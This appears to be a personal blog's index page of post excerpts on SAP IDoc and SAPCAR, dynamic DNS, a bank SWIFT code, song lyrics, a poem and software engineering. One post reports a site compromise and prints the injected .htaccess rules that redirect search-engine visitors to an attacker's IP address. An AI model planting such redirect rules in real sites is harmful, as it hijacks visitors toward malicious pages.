26 Jul
IDoc Interface (BC-SRV-EDI)
Standard SAP format for electronic data interchange between systems (Intermediate Document).
Different message types (for example, delivery confirmations or purchase orders) normally represent the different specific formats, known as IDoc types. Multiple message types with related content can be assigned to one IDoc type
Example:
The IDoc type ORDERS01 transfers the logical message types ORDERS (purchase […]
Posted in Uncategorized by: Amos
177 Comments
19 Jun
Dear white,
something you got to know.
When i was born, i was black.
When i grow up, i am black.
When i’m under the sun,i’m black.
When i’m cold, i’m black.
When i’afraid, i’m black.
When i die,i’m still black.
You–white people
When you were bor,. you were pink.
When you grow up, you become white.
You’re red under the sun.
Your’re blue when you’re cold.
You’re […]
Posted in Uncategorized by: Amos
4013 Comments
09 May
Dynamic DNS is useful if you want to access your computer out side, or you want to run a small / personal web site.
The following web site provides a Free dynamic DNS for sub-domains:
http://www.changeip.com/
This page contains a lot of web sites providing dynamic DNS service:
http://www.technopagan.org/dynamic/
Enjoy.
Posted in Uncategorized by: Amos
3 Comments
30 Apr
The SWIFT Code of CMB China Bank is:
Debit card: CMBCCNBS
Credit card: CMBCCNBS051
To get money from you Credit card, the fee is: 5/1000 of the amount, at least RMB 5, at most RMB 50.
Posted in Uncategorized by: Amos
95 Comments
21 Apr
SAP has its own compress format “.SAR”, and provides a tool named “SAPCAR”, although there are a lot of compress software available in the market.
SAPCAR is available for all kinds of operating systems. For example, the SAPCAR 7.00 is available for:
AIX 64bit
HP-UX on IA64 64bit
HP-UX on PA-RISC 64bit
Linux on IA32 32bit
Linux on IA64 64bit
Linux on […]
Posted in Uncategorized by: Amos
379 Comments
11 Jan
My web site was attacked by 89.28.13.200 via change of .htaccess file in the web site root directory, here is the data changed by the spyware:
.htaccess
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*oogle.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ahoo.*$ [NC]
RewriteRule .* http://89.28.13.200/join.html?s=join [R,L]
Only someone open your site from search engine […]
Posted in Uncategorized by: Amos
212 Comments
01 Oct
From film Leon
By Sting
He deals the cards as a meditation
And those he plays never suspect
He doesn’t play for the money he wins
He don’t play for respect
He deals the cards to find the answer
The sacred geometry of chance
The hidden law of a probable outcome
The numbers lead a dance
I know that the spades are the swords […]
Posted in Uncategorized by: Amos
10 Comments
18 Sep
1. Develop a mini kernal of ABAP Basis:
Target size is less than 1G; less than 100MB will be even better.
2. Make the modules plug-able
3. SAP Business One should based on the mini kernal instead of Microsoft Virtual Studio.
4. SAP ECC should be re-factoried based on the new kernal.
To reduce […]
Posted in Uncategorized by: Amos
14 Comments
08 Sep
Until now, software development is somewhat like an art instead of engineering. The quality of art depends on the author; while engineering should ensure the same result no matter whoever will do it.
Posted in Uncategorized by: Amos
6 Comments
08 Sep
Document is essential for a project; even more import than source code sometimes.
We can create documents for our project in a lot of formats; including Microsoft word/excel, Adobe PDF, HTML like java doc, and so on. Every company may have created all kinds of templates in word; they have nice title and footer, with the […]
Posted in Uncategorized by: Amos
7 Comments